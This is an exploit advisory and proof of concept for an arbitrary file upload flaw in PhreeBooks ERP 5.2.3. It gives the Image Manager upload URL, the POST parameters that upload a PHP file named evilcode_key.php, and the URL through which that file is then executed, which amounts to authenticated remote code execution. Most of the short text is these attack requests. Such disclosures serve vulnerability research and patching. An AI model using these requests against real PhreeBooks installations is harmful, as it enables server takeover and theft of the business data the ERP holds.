PhreeBooks ERP v5.2.3 - Arbitrary File Upload # Date: 03.04.2019 # Exploit Author: Abdullah Çelebi # Vendor Homepage: # Software Link: # Category: Webapps # Version: 5.2.3 # Tested on: WAMPP @Win # Software description: PhreeBooks 5 is a completely new web based application that utilizes the redesigned Bizuno ERP library from PhreeSoft. Bizuno supports PHP 7 along with all the latest versions of mySQL. Additionally, Bizuno utilizes the jQuery EasyUI graphical interface and will be also enhanced for mobile devices and tablets. # Vulnerabilities: # An attacker could run a remote code after an authorized user login using the parameter. # Code Section @Tools>Image Manager // # POC - RCE via Arbitrary File Upload : Process during upload malicious file; http://localhost/PhreeBooksERP/index.php?&p=bizuno/image/manager&imgTarget=&imgMgrPath=&imgSearch=&imgAction=upload Post section details; imgSearch=&imgFile=evilcode_key.php Result; http://localhost/PhreeBooksERP/bizunoFS.php?&src=0/images/evilcode_key.php